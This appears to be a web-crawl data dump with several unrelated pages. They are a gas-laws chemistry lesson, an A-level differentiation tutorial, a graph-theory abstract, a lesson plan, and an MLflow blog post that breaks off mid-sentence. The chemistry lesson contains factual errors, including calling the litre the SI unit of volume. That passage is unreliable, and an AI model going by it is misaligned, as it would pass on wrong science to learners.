msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:842ee6dd-0b7f-4a21-9a71-6f96b25e6a88>\",\"WARC-Concurrent-To\":\"<urn:uuid:91b8db04-8b9b-446b-9bb4-e6261daff1d0>\",\"WARC-IP-Address\":\"207.207.126.61\",\"WARC-Target-URI\":\"http://musictheory.pugetsound.edu/mt21c/LeadSheetSymbols.html\",\"WARC-Payload-Digest\":\"sha1:MDKF4DTBK6IBURAQA3BQYE73JSZQ3YWI\",\"WARC-Block-Digest\":\"sha1:R64JKNV3JG2JG7J57UASNT2NEODNFM44\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496671363.79_warc_CC-MAIN-20191122143547-20191122172547-00411.warc.gz\"}"}
https://afoggyone.tripod.com/chem451-L1.html
[ "Some facts, Information, and History of the Concept of Gases The ideal gas equation is PV=nRT. This is derived from Boyle's Law, Charles' Law, and Avogadro's hypothesis. The standard units used for this equation include the PASCAL for pressure. Pascals (Pa) are measured in Newtons per meter squared. Also used are the ATMOSPHERE (atm), of which one atm is defined as 101.325 kPa, and the barr, which has been arbitrarily set as equal to 100 kPa. The final pressure unit is the torr, defined as one seven-hundred and sixtieth of an atmosphere, and roughly equivalent to one millimeter of Mercury on the old manometer scales. The SI unit of volume is of course the LITER, where one millileter equals the volume of one cubic centimeter. Temperature is measured by the KELVIN (note that it is not DEGREE Kelvins, only Kelvins). One Kelvin equals one degree celsius plus 273.15, and one degree celsius equals one degree fahrenheit subtracted by thirty-two degrees and then multiplied by five-nineths. This ends our discussion on the standards of working with gasses. The experimentation leading to the Ideal Gas Law began in the seventeenth century through the work of Robert Boyle. Boyle discovered that when holding the temperature of a closed system constant, volume increased inversely to pressure (causing the graph of a hyperbola in the first quadrant). When Boyle then increased the temperature, the graph of the hyperbola shifted to the right, while a decrease shifted the graph to the left. This discovery, that pressure and volume were inversely proportional with temperature acting only as a modifier, was the first third of the ideal gas puzzle. The next piece was assembled by Charles in the eighteenth century. Instead of holding the temperature constant for his experiments, Charles chose to make the pressure constant. In doing so he discovered that volume and temperature were directly proportional. By playing with the equation, Charles was able to determine that Volume equalled the temperature multiplied by a constant. Eventually it was realized that this equation could be further simplified to volume equals temperature times a constant divided by pressure. But what was this constant? It was a difficult number to pin down, seeming to vary in increments depending on the situation. Eventually this constant was determined and explained through the use of n. N is defined as \"the amount of substance\" in PV=nRT and is usually measured in moles, where one mole is equal to the number of atoms of the most common isotope of carbon in 12.000 grams. This is called Avogadro's Constant and is 6.022 * 10^23 moles^-1. This number, discovered by Avogadro, was based on his observation that if the volume, temperature, and pressure are the same for two gasses, then n is the same for those same two gasses, leading to PV=nRT. The next topic to be dealt with at this time involves the concept of Partial Pressures. Rarely in life does one encounter just one gas; air, for example, is approximately seventy-nine percent nitrogen, twenty percent oxygen, and less than one percent of argon, carbon dioxide, and the rest. So what exactly is \"air pressure\" then? The answer to this is thankfully simple. Air pressure is the cumulative sum of the pressure from all of the other gases. This can be extended to say that the pressure on any surface is equal to the pressures exerted onto it by all gases present, or the partial pressures of the gases. The partial pressure of a gas is determined through PV=nRT, just as with anything else, although here n refers specifically to the amount of only that gas present. By summing the partial pressures the total pressure is arrived at easily, and through a few simple computations so too can the molecular weight of the gas. By dividing the partial pressure by the total pressure or the partial n by the total n, a Mole Fraction, abbreviated Xi can be arrived upon. The sum of the quantities of the mole fraction multiplied by the molecular weight of the gas for which the mole fractions were calculated yields the molecular weight of the gases in question. Thust ends the first lesson." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9576131,"math_prob":0.9812202,"size":4138,"snap":"2021-31-2021-39","text_gpt3_token_len":880,"char_repetition_ratio":0.13328496,"word_repetition_ratio":0.00433526,"special_character_ratio":0.20130497,"punctuation_ratio":0.10165184,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9977201,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-01T06:27:34Z\",\"WARC-Record-ID\":\"<urn:uuid:0ceba34c-03c2-4cc5-826e-450a36d9581a>\",\"Content-Length\":\"19488\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe59b351-aa83-4fc0-b6da-ca9989e8f860>\",\"WARC-Concurrent-To\":\"<urn:uuid:c9ed3128-f6bd-4f14-9e9a-9d1fa6dff42c>\",\"WARC-IP-Address\":\"209.202.252.105\",\"WARC-Target-URI\":\"https://afoggyone.tripod.com/chem451-L1.html\",\"WARC-Payload-Digest\":\"sha1:2FU5MGROCWBDZGHL2WW76GEYBCV4BRDN\",\"WARC-Block-Digest\":\"sha1:LIQXECALOAFZYW3MFXCRNBCF5NBI36QV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154163.9_warc_CC-MAIN-20210801061513-20210801091513-00607.warc.gz\"}"}
https://alevelmaths.co.uk/pure-maths/calculus/differentiation-from-first-principle/
[ "# Differentiation From First Principle\n\nContents\n\n### Summary\n\n4 steps to work out differentiation from the First Principle:\n\n1. Give increments to both x & y i.e", null, "$\\Delta x,\\quad \\Delta y$.\n2. Find change", null, "$\\Delta y$ of y.\n3. Find rate of change of y with respect to x i.e", null, "$\\frac { \\Delta y }{ \\Delta x }$  or", null, "$\\frac { dy }{ dx }$.\n4. Take the limit of", null, "$\\frac { \\Delta y }{ \\Delta x }$  as", null, "$\\Delta x\\quad \\rightarrow \\quad 0$.\n\nWe know that the gradient of a line is always constant and can be found from the following equation:", null, "$Gradient\\quad =\\quad \\frac { { y }_{ 2 }\\quad -\\quad { y }_{ 1 } }{ { x }_{ 2 }\\quad -\\quad { x }_{ 1 } }$", null, "$=\\quad \\frac { difference\\quad in\\quad y\\quad coordinate }{ difference\\quad in\\quad x\\quad coordinate }$\n\nA curve is not a straight line, hence its gradient is still not constant. It is changing from one point to another point on the curve. So we don’t have a set gradient for a curve.\n\nConsider two points", null, "$P({ x }_{ 1 },\\quad { y }_{ 1 })$ and", null, "$Q({ x }_{ 2 },\\quad { y }_{ 2 })$ on a curve in ‘Fig 1’.", null, "The gradient of the straight line:", null, "$PQ\\quad =\\quad \\frac { { y }_{ 2 }\\quad -\\quad { y }_{ 1 } }{ { x }_{ 2 }\\quad -\\quad { x }_{ 1 } }$\n\nIf we move from point Q towards point P, we are actually moving from", null, "${ x }_{ 2 }$ towards", null, "${ x }_{ 1 }$ and from", null, "$y_{ 2 }$ towards", null, "$y_{ 1 }$.\n\nHence when Q approaches , the line PQ becomes the tangent line at P.\n\nWe can say that now the gradient of line PQ is ‘m’ which is also known as the gradient of the curve at point P. Also ‘m’ is the gradient of the tangent at P.\n\nTherefore, we define the gradient of a curve at a point P to be the gradient of the tangent drawn at that point.\n\nWe now find the gradient of a curve by the method known as ‘differentiation from the first principle’.\n\n#### What is differentiation from the first principle?\n\nTo start of with, consider a curve with equation", null, "$y\\quad =\\quad { x }^{ 2 }$. Let P and Q be two points on the curve with coordinates P(x, y) and", null, "$Q(x\\quad +\\quad \\Delta x,\\quad y\\quad +\\quad \\Delta y)$ where", null, "$\\Delta x$ and", null, "$\\Delta y$ represent small increments in x and y respectively.\n\nFor:", null, "$y\\quad =\\quad { x }^{ 2 }$\n\nStep 1:", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad { (x\\quad +\\quad \\Delta x) }^{ 2 }$", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)$\n\nStep 2:\n\nMake", null, "$\\Delta y$ the subject", null, "$\\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)\\quad -\\quad y$\n\nSubstitute", null, "$y\\quad =\\quad { x }^{ 2 }$  in the above equation", null, "$\\Delta y\\quad =\\quad { x }^{ 2 }\\quad +\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)\\quad -\\quad { x }^{ 2 }$", null, "$\\Delta y\\quad =\\quad { (\\Delta x) }^{ 2 }\\quad +\\quad 2x(\\Delta x)$\n\nAs", null, "$\\Delta x$ is common we take it to the other side of the equation.\n\nStep 3:", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\Delta x\\quad +\\quad 2x$\n\nAs Q approaches P", null, "$\\Delta x$ becomes smaller and smaller and eventually becomes zero. At this instance, the gradient of PQ becomes the gradient of the tangent at P.\n\nStep 4:\n\nAs", null, "$Q\\quad \\rightarrow \\quad P$,  gradient of", null, "$QP\\quad =\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { \\Delta y }{ \\Delta x } ) }$", null, "$=\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\Delta x\\quad +\\quad 2x) }$", null, "$=\\quad 0\\quad +\\quad 2x$", null, "$=\\quad 2x$", null, "$\\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { \\Delta y }{ \\Delta x } ) }$  is called the differential coefficient of y with respect to x OR derivative of y with respect to x and is symbolically written as", null, "$\\frac { dy }{ dx }$.\n\nThe above method of finding the differential coefficient of y with respect to x is known as “Differentiation from the First Principles”.\n\nIt involves four steps:\n\n Step 1 Give increments to both x & y i.e", null, "$\\Delta x,\\quad \\Delta y$ Step 2 Find change", null, "$\\Delta y$ of y Step 3 Find rate of change of y with respect to x i.e", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad or\\quad \\frac { dy }{ dx }$ Step 4 Take the limit of", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad as\\quad \\Delta x\\quad \\rightarrow \\quad 0$\n\n#### Example #1\n\nQ. Differentiate", null, "$\\frac { 2 }{ x }$ with respect to x from the First Principle.\n\nFirstly, let", null, "$y\\quad =\\quad \\frac { 2 }{ x } \\quad \\quad \\quad \\quad \\quad \\rightarrow \\quad equation\\quad 1$\n\nStep 1:\n\nGiving increments to x & y", null, "$y\\quad +\\quad \\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x }$\n\nStep 2:", null, "$\\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x } \\quad -\\quad y$\n\nSubstitute equation 1 in the above equation", null, "$\\Delta y\\quad =\\quad \\frac { 2 }{ x\\quad +\\quad \\Delta x } \\quad -\\quad \\frac { 2 }{ x }$", null, "$\\quad =\\quad \\frac { 2x\\quad -2x\\quad -2\\Delta x }{ x(x\\quad +\\quad \\Delta x) }$", null, "$\\quad =\\quad \\frac { -2\\Delta x }{ x(x\\quad +\\quad \\Delta x) }$\n\nStep 3:\n\nDivide both sides by", null, "$\\Delta x$", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2\\Delta x }{ x(x\\quad +\\quad \\Delta x)\\Delta x }$", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2 }{ x(x\\quad +\\quad \\Delta x) }$\n\nStep 4:\n\nWhen", null, "$\\Delta x\\quad \\rightarrow \\quad 0$", null, "$\\lim _{ \\Delta x\\rightarrow 0 }{ \\frac { \\Delta y }{ \\Delta x } } \\quad =\\quad \\lim _{ \\Delta x\\rightarrow 0 }{ (\\frac { -2 }{ x(x\\quad +\\quad \\Delta x) } ) }$", null, "$=\\quad (\\frac { -2 }{ x(x\\quad +\\quad 0) } )$\n\nAns:", null, "$\\frac { \\Delta y }{ \\Delta x } \\quad =\\quad \\frac { -2 }{ { x }^{ 2 } }$", null, "", null, "", null, "", null, "", null, "" ]
[ null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://i0.wp.com/alevelmaths.co.uk/wp-content/uploads/2018/12/1-6.png", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null, "https://s0.wp.com/latex.php", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.923683,"math_prob":1.0000048,"size":2340,"snap":"2023-40-2023-50","text_gpt3_token_len":568,"char_repetition_ratio":0.16481164,"word_repetition_ratio":0.085339166,"special_character_ratio":0.23760684,"punctuation_ratio":0.10139165,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000098,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T13:25:45Z\",\"WARC-Record-ID\":\"<urn:uuid:1de987cc-1e33-4340-be5e-c7576c62cb2b>\",\"Content-Length\":\"66849\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:470d4c03-7a79-4275-95a8-8548e5e10ee0>\",\"WARC-Concurrent-To\":\"<urn:uuid:0c3357f0-ebd5-4fc3-97ef-b7cf864c446e>\",\"WARC-IP-Address\":\"209.97.178.131\",\"WARC-Target-URI\":\"https://alevelmaths.co.uk/pure-maths/calculus/differentiation-from-first-principle/\",\"WARC-Payload-Digest\":\"sha1:7ASJDREMYIAPSR5RXGDFA5TKHF3IQSAU\",\"WARC-Block-Digest\":\"sha1:3CGLJJERXYLD6G2FCBZZRYYFJYSPOVR3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679102469.83_warc_CC-MAIN-20231210123756-20231210153756-00398.warc.gz\"}"}
https://dmtcs.episciences.org/3149
[ "## van Aardt, Susan, and Burger, Alewyn Petrus and Frick, Marietjie - The Existence of Planar Hypotraceable Oriented Graphs\n\ndmtcs:1310 - Discrete Mathematics & Theoretical Computer Science, March 16, 2017, Vol. 19 no. 1 - https://doi.org/10.23638/DMTCS-19-1-4\nThe Existence of Planar Hypotraceable Oriented Graphs\n\nAuthors: van Aardt, Susan, and Burger, Alewyn Petrus and Frick, Marietjie\n\nA digraph is \\emph{traceable} if it has a path that visits every vertex. A digraph $D$ is \\emph{hypotraceable} if $D$ is not traceable but $D-v$ is traceable for every vertex $v\\in V(D)$. It is known that there exists a planar hypotraceable digraph of order $n$ for every $n\\geq 7$, but no examples of planar hypotraceable oriented graphs (digraphs without 2-cycles) have yet appeared in the literature. We show that there exists a planar hypotraceable oriented graph of order $n$ for every even $n \\geq 10$, with the possible exception of $n = 14$.\n\nVolume: Vol. 19 no. 1\nSection: Graph Theory\nPublished on: March 16, 2017\nSubmitted on: February 17, 2017\nKeywords: planar,hypohamiltonian,Hypotraceable,oriented graph,MSC 05C10, 05C20, 05C38,[MATH] Mathematics [math],[INFO.INFO-DM] Computer Science [cs]/Discrete Mathematics [cs.DM]" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93412757,"math_prob":0.79480773,"size":549,"snap":"2020-45-2020-50","text_gpt3_token_len":164,"char_repetition_ratio":0.16880734,"word_repetition_ratio":0.06741573,"special_character_ratio":0.2513661,"punctuation_ratio":0.057142857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9739124,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-21T04:08:39Z\",\"WARC-Record-ID\":\"<urn:uuid:fd76362d-7e62-4add-ad29-6243c7dd2824>\",\"Content-Length\":\"33939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c1b4368f-33c3-4f0b-84ea-151753048955>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a037e11-f9fe-461a-94a2-5295c658cb2d>\",\"WARC-IP-Address\":\"193.48.96.94\",\"WARC-Target-URI\":\"https://dmtcs.episciences.org/3149\",\"WARC-Payload-Digest\":\"sha1:5VBW6UDWB6VKJEGTYMJ7YJHZUQO7HK5L\",\"WARC-Block-Digest\":\"sha1:C33K2PR7NVS5J2OFVUEZTMD2IWNMNYPJ\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107875980.5_warc_CC-MAIN-20201021035155-20201021065155-00386.warc.gz\"}"}
https://www.nagwa.com/en/plans/290125715391/
[ "# Lesson Plan: Resultant Motion and Force Physics\n\nThis lesson plan includes the objectives, prerequisites, and exclusions of the lesson teaching students how to show that motion in directions that are at right angles to each other can be represented by motion in one direction.\n\n#### Objectives\n\nStudents will be able to\n\n• calculate perpendicular components of a vector representing a displacement, velocity, acceleration, or force,\n• calculate the resultant of multiple vectors representing displacements, velocities, accelerations, or forces.\n\n#### Prerequisites\n\nStudents should already be familiar with\n\n• the sine, cosine, and tangent of an angle in a right triangle,\n• the Pythagorean theorem,\n• kinematic SUVAT equations.\n\n#### Exclusions\n\nStudents will not cover\n\n• 3D vectors." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.83689356,"math_prob":0.9387649,"size":760,"snap":"2023-14-2023-23","text_gpt3_token_len":151,"char_repetition_ratio":0.10449736,"word_repetition_ratio":0.0,"special_character_ratio":0.18026316,"punctuation_ratio":0.144,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.994159,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-02T22:19:43Z\",\"WARC-Record-ID\":\"<urn:uuid:64d10262-c548-4b7d-9aee-22b53aa48d83>\",\"Content-Length\":\"29717\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d19b3912-ad17-4098-8a04-91106fb59f88>\",\"WARC-Concurrent-To\":\"<urn:uuid:e49d20be-6e12-4375-92fc-67cd86f7f070>\",\"WARC-IP-Address\":\"172.67.69.52\",\"WARC-Target-URI\":\"https://www.nagwa.com/en/plans/290125715391/\",\"WARC-Payload-Digest\":\"sha1:26XIFZRFXW5FJSO6F57KQLLJ3RPRAMZJ\",\"WARC-Block-Digest\":\"sha1:J663P6CX2FFG2J5LMGHW4DNI26M6VFLW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224648858.14_warc_CC-MAIN-20230602204755-20230602234755-00334.warc.gz\"}"}
https://stdiff.net/MB2019021201.html
[ "My first try at MLflow\n\ntl;dl MLflow is cool but still requires some work to use it.\n\nImagine that several data scientists work for a data science project. They have to train a good predictive model. They have a lots of ideas. Thus they process the row data in various ways, sometimes add an additional data source to the original data, select features to remove non-significant features, and try to train various models, maybe including a multi-layer neural network. They do lots of experiments in order to improve their model.\n\nAt the end they have to deliver the best model: the feature matrix can be constructed by converting data in a certain method and we train a neural network with 4 layers. But where is the source code? Because they work Jupyter Notebook, there is an exported HTML but no executable script? Ok, I found it... But wait, the result is different from the previous result in the exported HTML file. Why?\n\nData science is science. We do lots of experiments to obtain a good predictive model. But if we do not manage trained models carefully, we will face a problem of reproducibility.\n\nSo how can we manage the trained models? Take a note about each model? Git commit with the result? Well, in fact there are several applications and web services for that purpose. For example FLOYDHUB and comet. They looks good but it is quite expensive for a small team.\n\nTherefore I tried MLflow as a substitute of you.", null, "MLflow is an open source project which is developed mainly by Databricks. The application has already supported many machine learning libraries/frameworks: scikit-learn, PyTorch, TensorFlow, Apache Spark. You can also use the application on R. According to the documentation, we do not need to learn not so many new things. Why don't we try it?\n\n## Too short overview of MLflow\n\nIt is definitely better to watch an official presentation for MLflow.\n\nRoughly speaking, MLflow consists of three components:\n\n• Tracking: logger of training\n• Projects: definition of the environment (conda env + how to execute)\n• Models: web API of the trained model\n\nMLflow Tracking logs a commit hash so that you can find the source code which produces a specified result.\n\nMLflow Projects is just a specification of a ML pipeline. A text file MLproject describes which development environment is used and how a script must be executed. Maybe you can easily understand it if you see an example.\n\nMLflow Models provides an easy way to provide a trained model as a web API.\n\nSo in the best scenario you can train many models you like, after that you can chose the best model from MLflow Tracking and thanks to MLflow Projects, you can reproduce the result. Moreover it is easy to integrate the trained model in a production system as part of microservices.\n\nYes, it sounds really cool.\n\n## Here is a data science project\n\nWARNING\n\n• My usage of MLflow is probably different from what the MLflow developers expect.\n• The version of MLflow is 0.8.1. Not the newest.\n\nYou have a large database. Every hour, every minute, every second you receive many records such as user behaviour on a web site. You want to create a better model which provides a better result for a business problem. So you want to give a new and better model regularly. The new model should be provided as a REST API, so that it is easy to apply the trained model from another server. Since the data is quite large and the project is very important for the business, several data scientists work for the project.\n\nCan you imagine the project well?\n\nThen let us consider what we have to do.", null, "As you see there are three steps.\n\n2. Processing: Convert the collected data into a single feature matrix.\n3. Training: Train a mathematical model with a machine learning algorithm.\n\nEach step can be done by a different data scientist. (I do not mean that a data scientist is responsible only for one of the steps.) So each script belongs to one of the steps. Thus in order to execute the whole pipeline we have to execute the three scripts in the right order after activating the environment we need.\n\n$conda activate yourenv$ python load-data.py ## Loading\n$python fs_stats_test.py ## Processing$ python randomforest.py ## Training\n\n\nMLflow Projects enables us to package the whole procedure. If you write MLproject then the following command gets the job done.\n\n$mlflow run . Since the last script stores the trained model, we can easily provide the trained model through web API $ mlflow pyfunc serve -p 1234 -m ....\n\n\nIt's easy, isn't it?\n\n## Challenges\n\nWell, in fact, it is not so easy. We have to care about lots of things. In other words you need to prepare several helper functions/classes to integrate the project into MLflow.\n\nThe challenges which I am going to say can be applied for another similar machine learning project framework.\n\n### 1. Coherent chain of steps\n\nMLflow Tracking logs the commit hash when you submit the results (parameters and metrics) automatically. So you can obtain the script which produces the needed result.\n\nYeah, you might forget to commit the modification before starting a run. (I will explain later what a run is.) This might be a typical mistake, but we ignore this: Everybody commits before starting a run.\n\nBut the problem is: A different script is based on a different commit.", null, "Imagine that a data scientist writes a script for data processing and start several runs. The first run fills missing values by the mean value. The second run fills the missing values by a random forest model. The third run adds an additional column which can be useful for us. The fourth run selects several columns by using a statistical test.\n\nYou can convert the data into a feature matrix in several ways and this is one of the important steps to train a good model. And the best feature matrix depends on a model and data. Last week the best model was a logistic regression with a feature matrix whose missing values were filled by a random forest. Because you got a lots of new data, the best model of this week can be an XGB model with a feature matrix whose missing values are filled by the mean value. This can really happen.\n\nIt is best that several feature matrices are available at any time. But every branch has only one direction, not several. Thus we have to manage several data processing somehow.\n\n### 2. Data-versioning\n\nA data scientist fetches data, say D1, and trains a model, say M1. Next week a different data scientist fetches data, say D2, and trains a different model, say M2. Then it is nonsense to compare CV scores of M1 and M2.\n\n(If we train the same model on D1 and D2, then you looks something similar to the learning curve, but it is not the case.)\n\nData has also a version. In one ML life cycle the data version should not changes. But it can change between two cycles.\n\nProblem is: the version of the script does not correspond to the version of the data. The same script can fetch different data set. Namely a commit hash does not help us. We have to manage the versions of data in a suitable way.\n\n### 3. Input data to the API\n\nUsing MLflow Modells we can easily store the trained model.\n\nmlflow.sklearn.log_model(model, \"model\")\n\n\nAnd we can provide the Web API of the trained model very easily. But the input data must suit the features in the feature variables. In other words, you have to apply data processing in advance.\n\nIf you want to use MLflow Modell in a production system, you cannot assume that the input data has already been processed as you expect. As we said above, the data processing can also change. Therefore you have to integrate your data processing between the raw data and the web API of MLflow.\n\n## Possible solutions\n\nIn my opinion one of the easy possible solutions to the challenges 1 and 2 is to use parameters.", null, "Before going into details, we would like to explain some important features and concepts for MLflow Tracking very briefly.\n\nA run is a unit of what you to want to log. A typical example is a model training.\n\nwith mlflow.start_run():\n### this and that ..\nmlflow.log_param(\"algorithm\", \"LogisticRegression\")\nmlflow.log_param(\"C\", 10)\nmlflow.log_metric(\"training score\", 0.890)\nmlflow.log_metric(\"test score\", 0.789)\n\n\nThen parameters and metrics are logged as the result of the run. The commit hash of the script is also logged. (Thus you can find the source code which you executed.) We should note that an option of the script is regarded as a parameter. Namely\n\n$python main.py --table transactions is same as mlflow.log_param(\"table\", \"transactions\") This is technical, but we need to care about it when we design a process with MLflow. ### Data-Versioning First we consider the data-versioning. You should give two parameters: • Type of data: the name of a table or a query • Retrieval time: when you retrieved the data The pair of the two is an ID of the data or a run. Just it. Your query is something like select * from t where year = '2018', and therefore you think you should use year as a parameter instead of the retrieval time? No, you should use it as an additional parameter, but it is better to have retrieval time. That is because the query can change. What if the query select * from t where year = '2018' becomes select t.*, s.col1 from t left join s on t.id = s.id where t.year = '2018'; because you need more data? Both queries return a data for 2018. ### Coherent chain of steps Actually we can tackle the first challenge in the same way. That is, we use a pair of \"type\" and executed time (run_time) as an ID of each step. step type run_time loading table loaded_time processing logic processed_time training algorithm trained_time Consider you write a script for data processing. Then your logic (how to fill missing values, how to create a new variable, etc.) is of course based on the data. Therefore a run of your data processing must have the ID of the run for the data loading and you also give the pair of logic (short name for the data processing) and processing_time. Therefore a run for data processing contains (at least) the following • table (query of the run for load) • retrieval_time (run time of the load run) • logic (query of the processing run) • processing_time (run time of the processing) The first two parameters specify the run for data load and the pair of the third and fourth parameters is the ID of the processing run.", null, "We can apply the same idea to a run in \"training\". That is, we give the ID of the training run (algorithm and trained_time) and the ID of the processing run which the training run is based on. (Of course you should give more parameters such as values of hyperparameters.)", null, "### Input data to the API This is a relatively technical problem. At first I naïvely thought that it is OK to use mlflow.py_func. But I do not still understand how we can make use of this module for our purpose. So I use a trick. The basic idea is easy to understand. If we can store an instance of the following class, then you can use it as \"model\". class MyModell: def __init__(self, processor, model): self.processor = processor self.model = model def predict(self, X, y=None): X_processed = self.processor(X) return self.model.predict(X_processed) I wrote a complete version of the class. You can store an instance of the class by mlflow.sklearn.log_model processor is a function which converts a row data into a feature matrix. It typically has an internal state such as a fitted LabelBinalizer. You store the function as an artifact at the processing run. They are two problems: 1) If you save a function with pickle, then you might not be able to deserialise the pickled function. In such a case you need to use dill instead of pickle. 2) MyModell class must be installed on the conda environment. Otherwise you can not deserialise the logged model. This is the reason why I wrote a simple class and put it on GitHub. You can install the module by the command $ pip install https://github.com/stdiff/model_enhanced/archive/v0.2.zip\n\n\nIn conda.yaml you can simply put\n\n- https://github.com/stdiff/model_enhanced/archive/v0.2.zip\n\n\n## Implementation of a ML project\n\nMLflow is a flexible framework. This is important because a process of a data science project normally depends largely on the project itself.\n\nBut in my opinion lots of functions still lack, especially ones which can deal with runs in an easy way. Therefore I have developed a sample project: mlflow-app.\n\nWarning:\n\n• The convention is slightly different from this blog entry. This is because I changed lots of concepts during development.\n• My implementation is incomplete. There is no unit test, several values are hard-coded, it can not easily extend to a general project process.\n• That is, this application is just a PoC, not of a productive quality.\n\nI assume that Anaconda is installed. You can clone the source code from my repository by the following command\n\ngit clone [email protected]:stdiff/mlflow-app.git\n\n\nThen you have to download the data set: Credit Card Fraud Detection. Put the zip file under data directory. We are going to build a predictive model for 